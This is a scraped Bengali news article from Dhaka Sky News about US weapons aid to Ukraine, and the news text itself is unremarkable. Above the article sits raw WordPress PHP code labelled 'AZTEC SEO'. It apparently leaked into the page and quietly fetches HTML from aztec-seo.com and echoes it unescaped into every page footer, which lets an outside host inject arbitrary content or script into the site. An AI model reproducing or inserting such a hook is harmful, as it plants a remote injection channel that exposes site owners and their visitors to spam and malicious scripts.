/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ইউক্রেনকে ৩ হাজার কোটি ডলারের অস্ত্র দিয়েছে যুক্তরাষ্ট্র | Dhaka Sky News

ডিএমপির ৩ থানায় নতুন ওসি

আগের সংবাদ

শিক্ষার মানোন্নয়নে সহযোদ্ধা হিসেবে পাশে থাকতে চাই : আ স ম ফিরোজ

পরের সংবাদ

ইউক্রেনকে ৩ হাজার কোটি ডলারের অস্ত্র দিয়েছে যুক্তরাষ্ট্র

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: February 22, 2023 , 7:36 pm

২৪ ফেব্রুয়ারি এক বছর পূর্ণ হতে যাচ্ছে ইউক্রেনে রাশিয়ার সামরিক অভিযান। গত বছর অভিযান শুরুর পর থেকে দেশটিকে অর্থ ও অস্ত্র সহায়তা দিয়ে আসছে যুক্তরাষ্ট্র
গত এক বছরে যুক্তরাষ্ট্র যুদ্ধবিধ্বস্ত ইউক্রেনকে কত টাকার অস্ত্র দিয়েছে- তার একটি হিসাব প্রকাশ করেছে তুরস্কের সরকারি বার্তা সংস্তা আনাদুলু।
বুধবার প্রকাশিত প্রতিবেদনে সংবাদমাধ্যমটি জানিয়েছে, যুদ্ধ শুরুর পর থেকে এ পর্যন্ত কিয়েভকে ৩ হাজার কোটি ডলারের অস্ত্র সহায়তা দিয়েছে ওয়াশিংটন। বাংলাদেশি মুদ্রায় যা দাঁড়ায় ৩ লাখ ১৮ হাজার (প্রতি ডলার ১০৬ টাকা হিসাবে) কোটি টাকা।
গত সোমবার আকস্মিক সফরে কিয়েভে যান মার্কিন প্রেসিডেন্ট জো বাইডেন। সফরে যতদিন প্রয়োজন দেশটির পাশে থাকার ঘোষণা দেন তিনি। এ সময় অতিরিক্ত অর্ধ বিলিয়ন ডলার দেওয়ার ঘোষণা দেন মার্কিন প্রেসিডেন্ট। এ অর্থ আর্টিলারি গোলাবারুদ, রাডার, অ্যান্টি-পার্সোনেল মাইনসহ বিভিন্ন সরঞ্জামের জন্য ব্যয় হবে।
প্রতিবেদনে বলা হয়েছে, রাশিয়া প্রতিবেশী দেশটিতে হামলা শুরুর পর থেকে ইউক্রেনে মার্কিন মোট সহায়তার পরিমাণ দাঁড়িয়েছে ২৯ দশমিক ৮ বিলিয়ন ডলার। অপরদিকে, ২০২১ সালের জানুয়ারিতে বাইডেন প্রশাসন দায়িত্ব নেওয়ার পর থেকে দেশটিতে মার্কিন সরকার ৩০ দশমিক ৪ বিলিয়ন ডলার সরবরাহ করেছে।